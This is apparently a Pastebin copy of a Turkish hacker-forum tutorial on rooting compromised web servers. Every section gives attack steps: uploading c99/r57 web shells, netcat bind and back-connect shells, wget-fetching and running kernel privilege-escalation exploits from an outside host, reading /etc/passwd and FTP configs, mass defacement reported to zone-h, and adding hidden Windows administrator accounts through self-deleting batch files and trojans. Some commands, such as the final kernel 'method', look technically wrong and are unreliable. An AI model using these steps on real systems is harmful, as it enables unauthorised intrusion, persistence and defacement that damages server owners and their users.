Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Selamün Aleyküm Cyberizmciler ben KingSkrupellos Cyberizm.Org. Bugün size server rootlamaya elimden geldiğince anlatmaya çalıştım. Konuya uygun videolarda buldum. Bu konuyu forumda
- https://www.cyberizm.org/cyberizm-win-linux-os-sunucuda-sh3ll-ile-rooting-olma-detayli-anlatim.html
- sevdiğim bir kardeşimin hatırına yaptım. Sizlerde faydalanın istedim.
- (Administrar/root) en servidores Windows (C99 Shell)
- [video=youtube]http://www.youtube.com/watch?v=LfX5n0a0RIk[/video]
- Windows Back Connect
- [video=youtube]http://www.youtube.com/watch?v=7gQ6cyqT_1k[/video]
- Linux Server Root
- [video=youtube]http://www.youtube.com/watch?v=aN6PklINTTU[/video]
- SQL injection+SHELL upload+Rooting a server
- [video=youtube]http://www.youtube.com/watch?v=dOpPbpUeeAo[/video]
- Serverda Shell ile root olmak için size lazım olan hack yemek malzemeleri => netcat programı, c99 veya r57 shell, zone-h sitesi mass deface kaydı perl, mass.pl, ve bir tanede index
- 1. YÖNTEM => Binshell ile açık bir porta bağlan. ondan sonra /tmp dizini her zaman permissonu 777 olan alandır, hostun üst dizinlerini görüntüleye biliyorsan /tmp dizinine girerek bindshelli buraya upload et.Eğer /tmp dizinini görme yetkin yoksa bindshelli ayrı bir servera atarız wget komutuyla shell bulunan serverın dizinine çek. /tmp te bindshellin duruyor ise (server türüne göre bindshellimiz) şimdi yapacağın iş c99 shell için tools bölümüne gelip bindshell yazan yerde bindshellimizin kullanıcı adı şifre ve portunu yazarak bağlanmaktır.Daha sonra tablodan halletcin işi.
- 2. YÖNTEM => NetCat programı ile ( hem sende kurulu hem karşı pc'de yada serverda kurulu olması gerekiyor - yada bir başka deyişle yüklenmesi gerekiyor )Daha sonra bir tablo çıkacak ondan sonrasını yine basitleşiyor.Bir diğer husus ise şöyle anlatıyım => Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz. karşımıza siyah ms-dos ekranı gelecek bu ekrana nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım.Servera bağladıysanız hangi yıl olduğu ve sürümü çıkacaktır.Mesela bu yıl 2014 sürümü 2.7 olsun mesela. C+ exploitlerin dilidir.wget komutuyla exploiti server upload edelim ornek olarakwget http://xxx.com/2.7.c Bazen ise shelli manuel upload etmek zorunda kalabilirsiniz.attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)chmod ayarı yapacagızchmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra./root diyerek exploitimizi çağırıyoruz ID komutuyla kontrol edin.Evet serverımız rootlandı ise bu aşamadan sonra WhoAmI komutuyla görebiliriz.şimdi musait bi yere indeximizi ve mass.pl yi atalım.serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
- bu komutlar :
- [code]/etc/vdomainaliases/
- /etc/vfilters/
- /var/www/vhosts/
- /var/named/
- /etc/passwd/
- /etc/hosts/
- /etc/apache/
- /etc/apache2/
- /etc/named.conf/
- Mesela benimki böyle oldu => /var/www/vhosts/ cd /var/www/hosts/ [/code]
- komutunu verdikten sonra
- ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
- siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
- kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
- önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
- mass deface biraz zaman alabilir sabırlı olmak gerek
- işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
- [code]cd..
- cd..
- cd perl
- cd bin[/code]
- perl zoneh.pl hack.txt KingSkrupellos Cyberizm.Org diye (nickimi yazdım) yazıp enter diyoruz. Siz kendinize göre yapın işte.
- 3. YÖNTEM => Dosya upload yapmanı engelleyen temp dizinindeki bir dosyayı etkisiz hale getirmen gerekiyor.c99 shell proc. buluo birçok dosyayı silmemiz gerekiyor ki
- işimiz kolaylaşsın ve sistem çöksün herkese root yetkisi versin.
- 4. YÖNTEM => Server security information:
- Open base dir: /home/siteismi/:/usr/lib/php:/usr/local/lib/php:/tm
- gibi bir yazı bulman gerekiyor. Burada sadece sana lazım olan etc/passwd'ler bunlar ya bas, eğer basamassan webroot shell yükle onunla çek etc/passwd'leri.
- şöyle yazılar çıkacak mesela
- [code]root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- Gibi bilgiler verecek şimdi root dizini şu şekil
- root:x:0:0:root:/root:/bin/bash olduğu için yukarıya from:0 to: 0
- yazarak giriş yapıcaz gerisi sizin işinize kalıyor ..
- 5. YÖNTEM => Ayrıyetten birde ftp rootlama yöntemi var. Pro ftp kulanan bir hosting ise bu yolları görüntüleyerek (dikat ediniz conf ) şifreleri değiştirip root olabilirsiniz elde edeceğiniz ana< ftp sizi root yapar hosting içerisinde /home klasörü bütün sitelerin olduğu dizindir
- [code]proftpd.conf - /etc/proftpd.conf.tmpeditlib
- /etc/proftpd.conf.bytes
- /etc/proftpd.conf.rpmnew
- /etc/proftpd.conf.rpmsave
- /etc/proftpd.conf-
- /etc/proftpd.conf,v
- /etc/proftpd.conf
- /scripts/proftpd.conf.default.bsd
- /scripts/proftpd.conf.default[/code]
- 6. YÖNTEM => Diğer kısa bir anlatım - Linux server rootlamak için =>
- wget http://www.siteadi.com/exploits/exploitadi
- chmod 777 exploitadi
- ./exploitadi
- Şeklinde kullanıp serverı rootlayabilirsiniz.
- 7. YÖNTEM => bir win servera fso destekLi bir scriptLe girdigimiz zaman cmd iLe
- uzaktan komut iLe user ekleyip ;
- [code]net user pow3rz 123456 /add[/code]
- şekLinde sonra net user localgroup administrator pow3rz /add
- şekLinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağLanıp istedigimizi yaparız bu bir yöntem ;
- Eğer ki user ekeleyemezseniz
- [code]net user administrator /random[/code]
- komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;
- ama şöyLe düşüneLİm bir Nt servera girdik ve komut girme yetkimiz yok.
- neLer yapabiLiriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.
- o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez
- hemen başlıyalım bir txt açın ;
- içine
- [code]@echo
- net user cyberizm 123456 /add[/code]
- yazın ve cyberizm.bat die kayıt edin çaLıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman
- cyberizm adında bir user oLuşturmuş olacak,
- şimdi hemen bir txt açıyoruz içine
- [code]@echo
- net user cyberizm 123456 /add
- del cyberizm.bat[/code]
- yazıyoruz ve cyberizm.bat die kaydediyoruz ve çalıştırıyoruz
- ve komuttan sonra cyberizm.bat siLinecegini göreceksiniz ve bu sayede fso içinde komut ekLetip
- useri kLetip aynı şekiLde administrator yetkisi vererek dosyaLarı siLdirip root düzeyine erişebiLİrsiniz.
- başka bir yöntem ; trojen iLe buda basit bir oLaydır arkadaşLar bir key buLnu kendi serverınızı oLuşturun.
- ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buLuşacaktır. gidin proğramın cLientini
- açın ipden bağLanın ve client sayesinde proğram sayesinde pc ye bağLanın.
- 8. YÖNTEM => 2.6.30 dan 2.6.36-rc8 olan kernellerde
- backconnect çektikten sonra şu komutla
- [code]echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds[/code]
- yazdıktan sonra root olabilirsiniz.
- Not : Her server da çalışmaz.
- Not 2 => Yöntemler daha fazla geliştirelebilir. Beyninizi kullanın. Yöntemleri kendinize göre farklılaştırabilirsiniz.
- Anlatım bu kadar yeter. Umarım faydalı olmuştur.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement